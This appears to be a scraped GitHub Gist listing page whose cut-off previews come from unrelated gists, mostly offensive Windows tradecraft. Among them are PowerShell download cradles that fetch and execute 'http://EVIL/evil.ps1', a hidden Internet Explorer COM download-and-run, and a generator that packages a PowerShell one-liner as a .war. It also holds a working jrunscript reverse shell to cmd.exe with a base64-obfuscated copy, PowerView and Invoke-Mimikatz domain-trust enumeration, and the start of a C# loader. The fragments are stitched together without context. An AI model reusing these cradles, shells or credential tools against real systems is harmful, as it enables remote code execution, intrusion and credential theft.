This Gist is created in 2014, and it's highliy outdated now, according to one of mitmproxy's manjor contributor (check his comment below). Thanks for letting us know, @mhils!
Modern applications usually make use of back-end API servers to provide their services. With a non-transparent HTTPs proxy, which intercepts the communication between clients and servers (aka the man-in-the-middle scheme), you can easily manipulate both API requests and responses.
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
| #!/usr/bin/python | |
| # Code that quickly generates a deployable .war for a PowerShell one-liner | |
| import zipfile | |
| import StringIO | |
| import sys | |
| def generatePsWar(psCmd, appName): |
Nashorn / Rhino:
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
| Get all zones: | |
| Get-WmiObject MicrosoftDNS_Zone -Namespace Root\MicrosoftDNS -ComputerName primary.testlab.local | Select ContainerName | |
| Get all A records from a zone: | |
| Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_ResourceRecord WHERE ContainerName='testlab.local'" -ComputerName primary.testlab.local | ?{$_.TextRepresentation -match " A "} | Select -Expand TextRepresentation | |
| Show remote branches: | |
| git branch -v -a | |
| To check out the remote branch: | |
| http://stackoverflow.com/questions/1783405/checkout-remote-git-branch | |
| git fetch | |
| git checkout <branch> | |
| # import PowerView and Invoke-Mimikatz | |
| Import-Module .\powerview.ps1 | |
| Import-Module .\mimikatz.ps1 | |
| # map all reachable domain trusts | |
| Invoke-MapDomainTrust | |
| # enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names | |
| Find-ForeignGroup -Domain external.local | |
| Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName |
| function ConvertFrom-UserParameter { | |
| <# | |
| .SYNOPSIS | |
| Converts a userparameters encoded blob into an ordered dictionary of decoded values. | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |